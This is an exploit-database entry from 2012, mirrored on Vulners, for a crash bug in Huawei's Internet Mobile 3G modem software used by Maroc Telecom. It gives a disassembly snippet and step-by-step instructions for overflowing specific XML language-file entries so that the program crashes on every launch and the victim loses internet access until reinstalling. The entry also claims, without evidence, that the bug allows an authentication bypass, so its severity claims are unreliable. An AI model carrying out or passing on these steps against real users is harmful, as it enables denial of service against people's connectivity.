Vulners
Lucene search
Maroc Telecom (HUAWEI Technologies) Exception handling
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
0 1
1 dark-puzzle[at]live[at]fr 0
0 ========================================== 1
1 Pentesting/exploit coding/bug research 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
[0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]
HIGH RISK EXPLOIT .
USE THIS EXPLOIT AT YOUR OWN RISK I'M NOT RESPONSIBLE OF ANY HARM .
USE THIS EXPLOIT AT YOUR OWN RISK I'M NOT RESPONSIBLE OF ANY HARM .
USE THIS EXPLOIT AT YOUR OWN RISK I'M NOT RESPONSIBLE OF ANY HARM .
#Exploit name : Internet Mobile - Maroc Telecom (HUAWEI Technologies) Exception handling vulnerability
#Author : Dark-Puzzle ([email protected])
#Type : Remote .
#Risk : High
#Vulnerable Version : 11.302.09.05.162 (Other Versions [If Available] May Also Be Vulnerable)
#Software Vendor : HUAWEI Technologies & Maroc Telecom .
#Software Link : Software is Installed Via The 3G connection modem.
#Date : 28 June 2012 .
--------------------------------------------------------------------------------------------------------
Exploit :
The Program Was Enabled To process the Exception .
The Exception is an access Violation to EAX by Flooding the CX in the ECX Register.
[Imp Registers] :
EAX 00190000 ASCII "Actx"
ECX 00000041
[Exception Handling In Main Thread]
Disassembly :
TEST ECX,ECX
JE SHORT COMCTL32.720AB00B
MOVZX ECX,WORD PTR DS:[EDX+EAX]
TEST CX,CX
JE SHORT COMCTL32.720AB00B
MOV WORD PTR DS:[EAX],CX <<----- Access Violation = Exception Handling Vulnerability .
INC EAX
INC EAX
DEC ESI
JNZ SHORT COMCTL32.720AAFF3
---------------------------------------------------------------------------------------------------------
Risks : HIGH
The program is crashed when Executing it . ( Double click , the interface is shown up, charging boutton is up then Boom Crash ) .
This exploit in the HUAWEI Modem is concidered a high one beacause the Attacker can edit the XML and lang files reffering to direct DLLs .
Which can cause in most of the times an edit of sensitive Lines. So , the attacker can have the privileges to bypass the program Authetification or to use the exception handling to DoS the users program until it's reinstalled (Not Restarded) . A normal user can't know the source of the crash problem which is related to the XML files . Nobody search or read in these files most of the times .
Then he will stay without Internet connection for a no short period of time , until reinstalling the program or contacting the vendor .
----------------------------------------------------------------------------------------------------------
How To Exploit : (USE IT AT YOUR OWN RISK , Je ne suis pas responsable de ce qui est fait par cette vulnerabilité) I'm not responsible of any harm .
Go to ----> C:\Progam Files\Internet Mobile\plugins\SMSUIPlugin (FOR Example)
Now open the lang files ---> French And English . SMSUIPlugin_fr-fr and SMSUIPlugin_en-us
Replace the line :
<item name="IDS_PLUGIN_NAME">Texte</item> and
<item name="IDS_PLUGIN_MENUITEM">Message &Texte</item> and this one
<item name="IDS_TREE_DINBOX">Boite de réception</item> Same Names just in english instead french
-------------------------------------------
Replace them with that (for example) :
This : <item name="IDS_PLUGIN_NAME">Texte</item>
Will become This : <item name="IDS_PLUGIN_NAME"> Very Very Very Huge Number Of AAA or whatever </item>
and the same thing for the other lines shown before . This will make the program Crash when it's opened .
The victim will be not able to run the software again until it's reinstalled .
A script will be soon available to replace automatically the Lang files . ( PoC )
-----------------------------------------------------------------------------------------------------
Dark-Puzzle (Souhail) .
\x90
Follow me : fb.me/dark.puzzle
\x90
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
\x90
Greetz to : M.C.A , Team-Hunter , [email protected] , All Inj3ct0r team Members , Packetstromsecurity.org , Ar-Devlopers....
\x90
Pentesting is my LIFE .
\x90
GREY HAT Mercy From M0rocC0 .
# 0day.today [2018-04-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jun 2012 00:00Current
6.8Medium risk
Vulners AI Score6.8